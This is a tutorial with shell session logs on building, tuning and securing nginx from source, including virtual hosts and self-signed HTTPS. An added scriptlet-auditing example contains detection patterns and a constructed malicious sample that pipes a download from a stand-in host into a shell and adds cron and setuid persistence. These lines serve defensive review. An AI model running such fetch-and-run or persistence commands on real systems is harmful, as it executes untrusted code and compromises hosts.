nginx

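Introduction:
######nginx#####


###Compiling and installing nginx from source###

Uses the configure, make, and make install commands.

1 Download the source package from the official site, www.nginx.org; the stable version is the better choice.

Before installing, make sure gcc is present on the system. To check whether gcc is installed: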
rpm  -q  gcc      
    
2 tar zxf nginx-1.12.0.tar.gz    

3 yum install -y pcre-devel

4 yum install -y openssl-devel

5 useradd -M -d /usr/local/lnmp/nginx -s /sbin/nologin  -u 800 nginx        ###create the nginx user###

6 cd nginx-1.12.0     ###the configure script is in this directory###

7  ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module

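#####Parameter notes####

--prefix=/usr/local/lnmp/nginx      ###the directory where the server's files are installed###

--user=nginx                ###the user to run as; it must exist on the system, and if not set the default is nobody###

--group=nginx                ###the group to run as###

--with-threads                ###enable thread support###

--with-http_ssl_module            ###build in the module that adds HTTPS support to http###

--with-http_stub_status_module        ###build in the module that exposes basic nginx status information: connection counts, requests handled, and so on###

8 make && make install

9 cd /usr/local/lnmp/nginx/conf        ###nginx's default configuration file, nginx.conf, is in this directory###

10 cd /usr/local/lnmp/nginx/sbin/    ###the nginx binary is in this directory###

11 ./nginx                 ###start the service###

On startup the service failed to start because the port was already in use: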

nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] bind() to 0.0.0.0:80 failed (98: Address already in use)
nginx: [emerg] still could not bind()

Fix:
nginx listens on port 80 by default, so check what is using the port:
[root@server1 sbin]# netstat -antlupt
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      1121/varnishd       
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      910/sshd            
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      986/master          
tcp        0      0 127.0.0.1:6082              0.0.0.0:*                   LISTEN      1119/varnishd       
tcp        0      0 172.25.78.1:22              172.25.78.250:36468         ESTABLISHED 1050/sshd           
tcp        0      0 :::8080                     :::*                        LISTEN      1249/httpd          
tcp        0      0 :::80                       :::*                        LISTEN      1121/varnishd       
tcp        0      0 :::22                       :::*                        LISTEN      910/sshd            
tcp        0      0 ::1:25                      :::*                        LISTEN      986/master          

This shows that varnish is holding port 80; either stop the varnish service or change the port varnish listens on.
[root@server1 sbin]# /etc/init.d/varnish stop
Stopping Varnish Cache:                                    [  OK  ]

Start the nginx service again:
[root@server1 sbin]# ./nginx 
[root@server1 sbin]# netstat -antlupt | grep nginx 
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      6323/nginx          


Test:
curl    -I    localhost

[root@server1 sbin]# curl  localhost -I
HTTP/1.1 200 OK
Server: nginx/1.12.0        ###the version is disclosed, which is undesirable###
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 03:57:23 GMT
Connection: keep-alive
ETag: "596ed8a3-264"
Accept-Ranges: bytes


[root@server1 nginx]# pwd
/usr/local/lnmp/nginx
[root@server1 nginx]# du -sh

5.9M    .        
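###Because the build includes debug-mode compilation, the install is fairly large; with debug compilation removed, the compiled program is only a few hundred KB###

####Recompile to hide the version information and shrink the compiled program to a few hundred KB###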

1 cd /usr/local/lnmp/nginx/sbin/
./nginx -s stop                ###stop the nginx service###

2 netstat -antlp            ###check that the service has stopped##

3 rm -fr /usr/local/lnmp/nginx/        ###delete the installed server directory###

4 cd nginx-1.12.0
make clean                ###before recompiling, clear the old object files and cached configuration###

5 rm -fr nginx-1.12.0            ###delete the extracted source directory###

6 tar zxf nginx-1.12.0.tar.gz         ###extract it again###

7 cd /root/nginx-1.12.0/src/core
vim nginx.h 
                
Contents:
#define nginx_version      1012000
#define NGINX_VERSION      "1.12.0"
#define NGINX_VER          "nginx/"    ###the version string is removed here###

8 cd /root/nginx-1.12.0/auto/cc
vim gcc
Contents: 
# debug
#CFLAGS="$CFLAGS -g"        ###comment this line out to remove debug-mode compilation###

9  ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module

10 make && make install

11  ln -s  /usr/local/lnmp/nginx/sbin/nginx   /sbin/    ###symlink, for easier access###


Test:

[root@server1 nginx]# du -sh
988K    

[root@server1 nginx]# curl -I localhost
HTTP/1.1 200 OK
Server: nginx/
Date: Thu, 20 Jul 2017 03:19:28 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Thu, 20 Jul 2017 03:16:18 GMT
Connection: keep-alive
ETag: "59702082-264"
Accept-Ranges: bytes
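
The before/after header check above can be automated. The following is an added example, not part of the original notes: a POSIX shell function (the name version_leaks is made up here) that reads response headers and reports any Server or X-Powered-By value carrying a version number. X-Powered-By goes beyond the case shown on this page, and the two sample responses are constructed from the curl output above.

```shell
#!/bin/sh
# Added example: report response headers that disclose a product version.
# Input: raw HTTP response headers on stdin (for example from `curl -sI URL`).

# Prints "name: value" for each Server / X-Powered-By header whose value
# contains a "/<digits>" version token. Exit status 0 if any was found, else 1.
version_leaks() {
    tr -d '\r' | awk '
        {
            colon = index($0, ":")
            if (colon == 0) next                 # status line or blank line
            name  = tolower(substr($0, 1, colon - 1))
            value = substr($0, colon + 1)
            sub(/^[ \t]+/, "", value)
            sub(/[ \t]+$/, "", value)
            if ((name == "server" || name == "x-powered-by") &&
                value ~ /\/[0-9]+(\.[0-9]+)*/) {
                print name ": " value
                found = 1
            }
        }
        END { exit(found ? 0 : 1) }'
}

# Constructed samples: the two responses shown above, without the annotations.
BEFORE='HTTP/1.1 200 OK
Server: nginx/1.12.0
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html'

AFTER='HTTP/1.1 200 OK
Server: nginx/
Date: Thu, 20 Jul 2017 03:19:28 GMT
Content-Type: text/html'

for sample in "$BEFORE" "$AFTER"; do
    if leak=$(printf '%s\n' "$sample" | version_leaks); then
        echo "LEAK  $leak"
    else
        echo "OK    no version in Server / X-Powered-By"
    fi
done
```

Against a live host, feed it the output of `curl -sI http://localhost/`. A version-free header can also be obtained without patching nginx.h by setting `server_tokens off;` in nginx.conf, which yields `Server: nginx`.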




The full session is as follows:
[root@server1 ~]# tar zxf nginx-1.12.0.tar.gz 
[root@server1 ~]# ls
anaconda-ks.cfg  install.log.syslog   varnish-3.0.5-1.el6.x86_64.rpm
bansys.zip       nginx-1.12.0         varnish-libs-3.0.5-1.el6.x86_64.rpm
install.log      nginx-1.12.0.tar.gz
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# ls
auto  CHANGES  CHANGES.ru  conf  configure  contrib  html  LICENSE  man  README  src
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module

(output omitted.....)
Problem encountered:
********************************************************************************
checking for PCRE library ... not found
checking for PCRE library in /usr/local/ ... not found
checking for PCRE library in /usr/include/pcre/ ... not found
checking for PCRE library in /usr/pkg/ ... not found
checking for PCRE library in /opt/local/ ... not found

./configure: error: the HTTP rewrite module requires the PCRE library.
You can either disable the module by using --without-http_rewrite_module
option, or install the PCRE library into the system, or build the PCRE library
statically from the source with nginx by using --with-pcre=<path> option.
***********************************************************************************
####This shows that the PCRE library is missing, so pcre-devel must be installed#####

[root@server1 nginx-1.12.0]# rpm -q gcc
gcc-4.4.7-4.el6.x86_64
[root@server1 nginx-1.12.0]# yum install -y pcre-devel
[root@server1 nginx-1.12.0]# rpm -q gcc
gcc-4.4.7-4.el6.x86_64
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module

(configure output omitted.....)
Problem encountered:
**************************************************************************
checking for PCRE JIT support ... not found
checking for OpenSSL library ... not found
checking for OpenSSL library in /usr/local/ ... not found
checking for OpenSSL library in /usr/pkg/ ... not found
checking for OpenSSL library in /opt/local/ ... not found

./configure: error: SSL modules require the OpenSSL library.
You can either do not enable the modules, or install the OpenSSL library
into the system, or build the OpenSSL library statically from the source
with nginx by using --with-openssl=<path> option.
**************************************************************************
###The message shows that the OpenSSL library is missing, so openssl-devel must be installed####

[root@server1 nginx-1.12.0]# yum install -y openssl-devel
[root@server1 ~]# useradd -M -d /usr/local/lnmp/nginx -s /sbin/nologin  -u 800 nginx

[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module
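(configure output omitted.....)
####No errors, so configure succeeded. In general, when something is reported missing during the build, install the corresponding xxxx-devel package, because a devel package is the C development package containing the C header files and libraries####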

[root@server1 nginx-1.12.0]# make && make install

[root@server1 nginx-1.12.0]# cd /usr/local/lnmp/
[root@server1 lnmp]# ls
nginx
[root@server1 lnmp]# cd nginx/
[root@server1 nginx]# ls
conf  html  logs  sbin
[root@server1 nginx]# du -sh
5.9M    .
[root@server1 nginx]# ls
conf  html  logs  sbin
[root@server1 nginx]# cd sbin/
[root@server1 sbin]# ls
nginx
[root@server1 sbin]# ./nginx 
[root@server1 sbin]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      6060/nginx          
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      900/sshd            
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      976/master          
tcp        0      0 172.25.38.1:22              172.25.38.250:39568         ESTABLISHED 1040/sshd           
tcp        0      0 172.25.38.1:22              172.25.38.250:39572         ESTABLISHED 1067/sshd           
tcp        0      0 :::22                       :::*                        LISTEN      900/sshd            
tcp        0      0 ::1:25                      :::*                        LISTEN      976/master          

[root@server1 sbin]# curl  localhost -I
HTTP/1.1 200 OK
Server: nginx/1.12.0        ###the version is disclosed, which is undesirable###
Date: Wed, 19 Jul 2017 03:59:11 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 03:57:23 GMT
Connection: keep-alive
ETag: "596ed8a3-264"
Accept-Ranges: bytes

[root@server1 sbin]# ./nginx -s stop
[root@server1 sbin]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      900/sshd            
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      976/master          
tcp        0      0 172.25.38.1:22              172.25.38.250:39568         ESTABLISHED 1040/sshd           
tcp        0      0 127.0.0.1:59479             127.0.0.1:80                TIME_WAIT   -                   
tcp        0      0 127.0.0.1:59481             127.0.0.1:80                TIME_WAIT   -                   
tcp        0      0 172.25.38.1:22              172.25.38.250:39572         ESTABLISHED 1067/sshd           
tcp        0      0 :::22                       :::*                        LISTEN      900/sshd            
tcp        0      0 ::1:25                      :::*                        LISTEN      976/master          
[root@server1 sbin]# cd /usr/local/
[root@server1 local]# cd lnmp/
[root@server1 lnmp]# rm -fr nginx/
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# make clean
rm -rf Makefile objs
[root@server1 nginx-1.12.0]# cd ..
[root@server1 ~]# rm -fr nginx-1.12.0
[root@server1 ~]# ls
anaconda-ks.cfg     nginx-1.12.0.tar.gz
bansys.zip          varnish-3.0.5-1.el6.x86_64.rpm
install.log         varnish-libs-3.0.5-1.el6.x86_64.rpm
install.log.syslog
[root@server1 ~]# tar zxf nginx-1.12.0.tar.gz 
[root@server1 ~]# ls
anaconda-ks.cfg     nginx-1.12.0
bansys.zip          nginx-1.12.0.tar.gz
install.log         varnish-3.0.5-1.el6.x86_64.rpm
install.log.syslog  varnish-libs-3.0.5-1.el6.x86_64.rpm
[root@server1 ~]# cd nginx-1.12.0
[root@server1 nginx-1.12.0]# ls
auto     CHANGES.ru  configure  html     man     src
CHANGES  conf        contrib    LICENSE  README
[root@server1 nginx-1.12.0]# cd src/
[root@server1 src]# ls
core  event  http  mail  misc  os  stream
[root@server1 src]# cd core/
[root@server1 core]# vim nginx.h 
[root@server1 core]# cd ..
[root@server1 src]# cd ..
[root@server1 nginx-1.12.0]# cd auto/
[root@server1 auto]# ls
cc          have          init     module   os       threads
define      have_headers  install  modules  sources  types
endianness  headers       lib      nohave   stubs    unix
feature     include       make     options  summary
[root@server1 auto]# cd cc/
[root@server1 cc]# ls
acc  bcc  ccc  clang  conf  gcc  icc  msvc  name  owc  sunc
[root@server1 cc]# vim gcc 
[root@server1 cc]# cd ..
[root@server1 auto]# cd ..
[root@server1 nginx-1.12.0]# ls
auto     CHANGES.ru  configure  html     man     src
CHANGES  conf        contrib    LICENSE  README
[root@server1 nginx-1.12.0]# ./configure --prefix=/usr/local/lnmp/nginx --user=nginx --group=nginx --with-threads --with-file-aio --with-http_ssl_module --with-http_stub_status_module

[root@server1 nginx-1.12.0]# make  && make  install
[root@server1 nginx-1.12.0]# cd /usr/local/lnmp/nginx/
[root@server1 nginx]# ls
conf  html  logs  sbin
[root@server1 nginx]# du -sh
960K    .
[root@server1 nginx]# cd sbin/
[root@server1 sbin]# ls
nginx
[root@server1 sbin]# ./nginx 
[root@server1 sbin]# pwd
/usr/local/lnmp/nginx/sbin
[root@server1 sbin]# ln -s /usr/local/lnmp/nginx/sbin/nginx /sbin/
[root@server1 sbin]# which nginx 
/sbin/nginx
[root@server1 sbin]# curl -I localhost
HTTP/1.1 200 OK
Server: nginx/
Date: Wed, 19 Jul 2017 04:07:59 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Wed, 19 Jul 2017 04:05:33 GMT
Connection: keep-alive
ETag: "596eda8d-264"
Accept-Ranges: bytes


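###When installing with yum, review the scripts the package runs at install time, to guard against rogue software###
Taking httpd as an example:

[root@server1 lnmp]# rpm -q --scripts httpd
preinstall scriptlet (using /bin/sh):        ###script run before installation##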
# Add the "apache" user
getent group apache >/dev/null || groupadd -g 48 -r apache
getent passwd apache >/dev/null || \
  useradd -r -u 48 -g apache -s /sbin/nologin \
    -d /var/www -c "Apache" apache
exit 0
postinstall scriptlet (using /bin/sh):        ###script run after installation##
# Register the httpd service
/sbin/chkconfig --add httpd
/sbin/chkconfig --add htcacheclean
preuninstall scriptlet (using /bin/sh):
if [ $1 = 0 ]; then
    /sbin/service httpd stop > /dev/null 2>&1
    /sbin/chkconfig --del httpd
    /sbin/service htcacheclean stop > /dev/null 2>&1
    /sbin/chkconfig --del htcacheclean
fi
posttrans scriptlet (using /bin/sh):
test -f /etc/sysconfig/httpd-disable-posttrans || \
 /sbin/service httpd condrestart >/dev/null 2>&1 || :


[root@server1 lnmp]# rpm -qi httpd    ###show the httpd package information##
Name        : httpd                        Relocations: (not relocatable)
Version     : 2.2.15                            Vendor: Red Hat, Inc.
Release     : 29.el6_4                      Build Date: Fri 02 Aug 2013 08:03:06 PM CST
Install Date: Wed 19 Jul 2017 09:34:59 AM CST      Build Host: x86-002.build.bos.redhat.com
Group       : System Environment/Daemons    Source RPM: httpd-2.2.15-29.el6_4.src.rpm
Size        : 3075393                          License: ASL 2.0
Signature   : RSA/8, Mon 12 Aug 2013 09:49:45 PM CST, Key ID 199e2f91fd431d51
Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
URL         : http://httpd.apache.org/
Summary     : Apache HTTP Server
Description :
The Apache HTTP Server is a powerful, efficient, and extensible
web server.
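
The scriptlet review above can be scripted. This is an added example, not part of the original notes: a shell function (hypothetical name audit_scriptlets) that reads `rpm -q --scripts` output and tags lines that create accounts, register services, download or pipe into a shell, touch cron/rc.local/authorized_keys, or set setuid bits. The pattern list is an assumption chosen for illustration; the httpd sample is copied from the output above and the second sample is constructed.

```shell
#!/bin/sh
# Added example: tag noteworthy lines in `rpm -q --scripts PACKAGE` output.

# Reads scriptlet text on stdin, prints "phase:tag[,tag]: line" per finding.
audit_scriptlets() {
    awk '
        BEGIN { phase = "unknown" }
        # "preinstall scriptlet (using /bin/sh):" starts a new phase.
        /^[a-z]+ scriptlet \(using [^)]*\):/ { phase = $1; next }
        {
            tags = ""
            if ($0 ~ /(^|[^A-Za-z0-9_])(curl|wget)([ \t]|$)/)
                tags = tags ",download"
            if ($0 ~ /\|[ \t]*(\/bin\/)?(ba)?sh([ \t;]|$)/)
                tags = tags ",pipe-to-shell"
            if ($0 ~ /(^|[^A-Za-z0-9_])(useradd|groupadd|usermod)[ \t]/)
                tags = tags ",account"
            if ($0 ~ /chkconfig[ \t]+--add|systemctl[ \t]+enable/)
                tags = tags ",service"
            if ($0 ~ /\/etc\/cron|\/etc\/rc\.local|authorized_keys/)
                tags = tags ",persistence"
            if ($0 ~ /chmod[ \t]+[^ \t]*\+s/)
                tags = tags ",setuid"
            if (tags != "") {
                sub(/^[ \t]+/, "", $0)
                printf "%s:%s: %s\n", phase, substr(tags, 2), $0
            }
        }'
}

# Sample 1: the httpd scriptlets shown above (annotations removed).
httpd_sample() {
    cat <<'EOF'
preinstall scriptlet (using /bin/sh):
# Add the "apache" user
getent group apache >/dev/null || groupadd -g 48 -r apache
getent passwd apache >/dev/null || \
  useradd -r -u 48 -g apache -s /sbin/nologin \
    -d /var/www -c "Apache" apache
exit 0
postinstall scriptlet (using /bin/sh):
# Register the httpd service
/sbin/chkconfig --add httpd
/sbin/chkconfig --add htcacheclean
preuninstall scriptlet (using /bin/sh):
if [ $1 = 0 ]; then
    /sbin/service httpd stop > /dev/null 2>&1
    /sbin/chkconfig --del httpd
fi
posttrans scriptlet (using /bin/sh):
test -f /etc/sysconfig/httpd-disable-posttrans || \
 /sbin/service httpd condrestart >/dev/null 2>&1 || :
EOF
}

# Sample 2: constructed scriptlet of the kind the review is meant to catch.
suspicious_sample() {
    cat <<'EOF'
postinstall scriptlet (using /bin/sh):
curl -s http://example.invalid/setup.sh | sh
cp agent.cron /etc/cron.d/agent
chmod u+s /opt/agent/run
EOF
}

echo "== httpd ==";      httpd_sample | audit_scriptlets
echo "== constructed =="; suspicious_sample | audit_scriptlets
```

For an installed package run `rpm -q --scripts NAME | audit_scriptlets`; for a downloaded file that is not yet installed, `rpm -qp --scripts FILE.rpm` produces the same format.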



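####Binding nginx to CPUs###

1 vim /usr/local/lnmp/nginx/conf/nginx.conf

Contents:
worker_processes  2;        ###start two nginx worker processes###
worker_cpu_affinity 01 10;    ###the first process is bound to the first CPU core, the second process to the second CPU core###

events {
    worker_connections  65535;    ###maximum number of connections per worker process; must not exceed fs.file-max###
}

2 nginx -t            ###check the configuration file for syntax errors###

3 nginx -s reload        ###reload nginx###

4  vim  /etc/security/limits.conf    ###the limit only takes effect when written in this file###

nginx        -        nofile        65535


Test:
Switch to the nginx user and run ulimit -a
(before switching, give the nginx user a login shell: usermod -s /bin/bash nginx)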
[root@server1 ~]# su - nginx
-bash-4.1$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 0
file size               (blocks, -f) unlimited
pending signals                 (-i) 14868
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 65535        ###now changed to 65535###
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 10240
cpu time               (seconds, -t) unlimited
max user processes              (-u) 1024
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited
-bash-4.1$ 



##nginx -s reload## The mask has one digit per core: 2 cores is 01, 4 cores is 0001, 8 cores is 00000001, and so on###
[root@server1 conf]# sysctl  -a | grep file        ###sysctl -a displays all system parameters###
fs.file-nr = 512    0    188464
fs.file-max = 188464
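
The mask rule and the limits described above, as an added example that is not part of the original notes: shell functions (hypothetical names) that generate the worker_processes and worker_cpu_affinity lines for a given core count and compare worker_connections with the nofile and fs.file-max limits. The numbers used are the ones shown on this page.

```shell
#!/bin/sh
# Added example: build worker_cpu_affinity masks and check connection limits.

# Mask for worker W (0-based) on a host with CORES cores: CORES digits, all 0
# except a 1 in position W counted from the right (worker 0 -> ...0001).
affinity_mask() (
    worker=$1
    cores=$2
    mask=""
    i=$((cores - 1))
    while [ "$i" -ge 0 ]; do
        if [ "$i" -eq "$worker" ]; then mask="${mask}1"; else mask="${mask}0"; fi
        i=$((i - 1))
    done
    printf '%s\n' "$mask"
)

# Print the two nginx.conf lines that pin one worker to each of CORES cores.
affinity_lines() (
    cores=$1
    case $cores in
        ''|*[!0-9]*|0) echo "cores must be a positive integer" >&2; exit 2 ;;
    esac
    line="worker_cpu_affinity"
    w=0
    while [ "$w" -lt "$cores" ]; do
        line="$line $(affinity_mask "$w" "$cores")"
        w=$((w + 1))
    done
    printf 'worker_processes  %s;\n%s;\n' "$cores" "$line"
)

# Compare worker_connections with the per-user nofile limit (limits.conf) and
# the system-wide fs.file-max. Exit 0 when it fits under both, 1 otherwise.
check_limits() (
    conns=$1
    nofile=$2
    file_max=$3
    rc=0
    if [ "$conns" -gt "$file_max" ]; then
        echo "worker_connections $conns exceeds fs.file-max $file_max" >&2
        rc=1
    fi
    if [ "$conns" -gt "$nofile" ]; then
        echo "worker_connections $conns exceeds nofile limit $nofile" >&2
        rc=1
    fi
    exit "$rc"
)

# Values from this page: 2 cores, worker_connections 65535,
# nofile 65535, fs.file-max 188464.
affinity_lines 2
check_limits 65535 65535 188464 && echo "limits ok"
```

On a live host the inputs come from `nproc`, `ulimit -n` run as the nginx user, and `sysctl -n fs.file-max`. nginx 1.9.10 and later also accept `worker_cpu_affinity auto;`, which assigns the masks without listing them.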






####Creating an nginx virtual host###

Default document root:
/usr/local/lnmp/nginx/html

1 vim /usr/local/lnmp/nginx/conf/nginx.conf 
Contents (note: this block must go inside the http block):

server {
    listen 80;                ###listen on port 80###
    server_name www.westos.org;        ###server name###
    location / {
        root     /web1;            ###document root###
        index    index.html;        ###index page###
    }

}

2 mkdir /web1

3 vim /web1/index.html
Contents:
<h1>www.westos.org</h1>

4 nginx -s reload 

Test:



The full session is as follows:
[root@server1 lnmp]# cd /usr/local/lnmp/nginx/conf/
[root@server1 conf]# ls
fastcgi.conf            koi-win             scgi_params
fastcgi.conf.default    mime.types          scgi_params.default
fastcgi_params          mime.types.default  uwsgi_params
fastcgi_params.default  nginx.conf          uwsgi_params.default
koi-utf                 nginx.conf.default  win-utf
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -s reload
[root@server1 conf]# nginx -t 
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload
[root@server1 conf]# netstat -antlp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address               Foreign Address             State       PID/Program name   
tcp        0      0 0.0.0.0:80                  0.0.0.0:*                   LISTEN      8673/nginx          
tcp        0      0 0.0.0.0:22                  0.0.0.0:*                   LISTEN      900/sshd            
tcp        0      0 127.0.0.1:25                0.0.0.0:*                   LISTEN      976/master          
tcp        0      0 172.25.38.1:22              172.25.38.250:39568         ESTABLISHED 1040/sshd           
tcp        0      0 172.25.38.1:22              172.25.38.250:39572         ESTABLISHED 1067/sshd           
tcp        0      0 :::22                       :::*                        LISTEN      900/sshd            
tcp        0      0 ::1:25                      :::*                        LISTEN      976/master          
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# sysctl -a | grep file
fs.file-nr = 544    0    188464
fs.file-max = 188464
[root@server1 conf]# ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 0
file size               (blocks, -f) unlimited
pending signals                 (-i) 14868
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1024
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 10240
cpu time               (seconds, -t) unlimited
max user processes              (-u) 14868
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited
[root@server1 conf]# id 
uid=0(root) gid=0(root) groups=0(root)
[root@server1 conf]# vim /etc/security/limits.conf 
[root@server1 conf]# usermod -s /bin/bash nginx
[root@server1 conf]# su - nginx
-bash-4.1$ ulimit -a
core file size          (blocks, -c) 0
data seg size           (kbytes, -d) unlimited
scheduling priority             (-e) 0
file size               (blocks, -f) unlimited
pending signals                 (-i) 14868
max locked memory       (kbytes, -l) 64
max memory size         (kbytes, -m) unlimited
open files                      (-n) 1024
pipe size            (512 bytes, -p) 8
POSIX message queues     (bytes, -q) 819200
real-time priority              (-r) 0
stack size              (kbytes, -s) 10240
cpu time               (seconds, -t) unlimited
max user processes              (-u) 1024
virtual memory          (kbytes, -v) unlimited
file locks                      (-x) unlimited
-bash-4.1$ exit 
logout
[root@server1 conf]# usermod -s /sbin/nologin nginx
[root@server1 conf]# vim nginx.conf
[root@server1 conf]# nginx -t        ###check for syntax errors##
nginx: the configuration file /usr/local/lnmp/nginx/conf/nginx.conf syntax is ok
nginx: configuration file /usr/local/lnmp/nginx/conf/nginx.conf test is successful
[root@server1 conf]# nginx -s reload    ###reload###
[root@server1 conf]# mkdir /web1
[root@server1 conf]# cd /web1/
[root@server1 web1]# ls
[root@server1 web1]# vim index.html
[root@server1 web1]# nginx -s reload
[root@server1 web1]# cd /usr/local/lnmp/
[root@server1 lnmp]# ls
nginx
[root@server1 lnmp]# cd nginx/
[root@server1 nginx]# ls
client_body_temp  fastcgi_temp  logs        sbin       uwsgi_temp
conf              html          proxy_temp  scgi_temp
[root@server1 nginx]# cd html/
[root@server1 html]# ls
50x.html  index.html




####https####

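The port is 443. Before configuring, confirm that openssl and openssl-devel are installed; they were already installed for the source build, so there is no need to install them again here.
On host trust: a server that uses HTTPS must obtain from a CA a certificate that attests to the server's purpose.
When the traffic between server and client should be encrypted so that eavesdropping in transit cannot leak information, HTTPS provides that encryption. If the site is only for internal staff, you can issue the certificate yourself.



1 cd     /etc/pki/tls/certs/

2 make cert.pem            ###generates the certificate and key; this command puts the certificate and key in one file, so the nginx configuration does not need to name two files###

Output: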
umask 77 ; \
    PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
    PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
    /usr/bin/openssl req -utf8 -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 -set_serial 0 ; \
    cat $PEM1 >  cert.pem ; \
    echo ""    >> cert.pem ; \
    cat $PEM2 >> cert.pem ; \
    rm -f $PEM1 $PEM2
Generating a 2048 bit RSA private key
........................................................+++
..............................+++
writing new private key to '/tmp/openssl.UVFnm7'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:cn
State or Province Name (full name) []:shaanxi
Locality Name (eg, city) [Default City]:xi'an
Organization Name (eg, company) [Default Company Ltd]:westos
Organizational Unit Name (eg, section) []:linux
Common Name (eg, your name or your server's hostname) []:server1
Email Address []:root@westos.org


3 mv /etc/pki/tls/certs/cert.pem  /usr/local/lnmp/nginx/conf/  ###the nginx configuration refers to the file by a relative path, so move it into the configuration directory###

4 vim  /usr/local/lnmp/nginx/conf/nginx.conf

Contents:
 server {
        listen       443 ssl;
        server_name  www.westos.org;

        ssl_certificate      cert.pem;
        ssl_certificate_key  cert.pem;

        ssl_session_cache    shared:SSL:1m;
        ssl_session_timeout  5m;

        ssl_ciphers  HIGH:!aNULL:!MD5;
        ssl_prefer_server_ciphers  on;

        location / {
            root   /web1;
            index  index.html index.htm;
        }
    }

5 nginx       -s      reload        


Test:
Browse to https://172.25.38.1



The full session is as follows:
[root@server1 conf]# cd /etc/pki/tls/certs/
[root@server1 certs]# ls
ca-bundle.crt  ca-bundle.trust.crt  make-dummy-cert  Makefile  renew-dummy-cert
[root@server1 certs]# make cert.pem
umask 77 ; \
    PEM1=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
    PEM2=`/bin/mktemp /tmp/openssl.XXXXXX` ; \
    /usr/bin/openssl req -utf8 -newkey rsa:2048 -keyout $PEM1 -nodes -x509 -days 365 -out $PEM2 -set_serial 0 ; \
    cat $PEM1 >  cert.pem ; \
    echo ""    >> cert.pem ; \
    cat $PEM2 >> cert.pem ; \
    rm -f $PEM1 $PEM2
Generating a 2048 bit RSA private key
........................................................+++
..............................+++
writing new private key to '/tmp/openssl.UVFnm7'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [XX]:cn
State or Province Name (full name) []:shaanxi
Locality Name (eg, city) [Default City]:xi'an
Organization Name (eg, company) [Default Company Ltd]:westos
Organizational Unit Name (eg, section) []:linux
Common Name (eg, your name or your server's hostname) []:server1
Email Address []:root@westos.org
[root@server1 certs]# ll
total 1716
-rw-r--r--. 1 root root 753868 Sep  4  2013 ca-bundle.crt
-rw-r--r--. 1 root root 974993 Sep  4  2013 ca-bundle.trust.crt
-rw-------  1 root root   3088 Jul 19 15:31 cert.pem
-rw-------  1 root root   1383 Jul 19 15:29 localhost.crt
-rwxr-xr-x. 1 root root    610 Sep 27  2013 make-dummy-cert
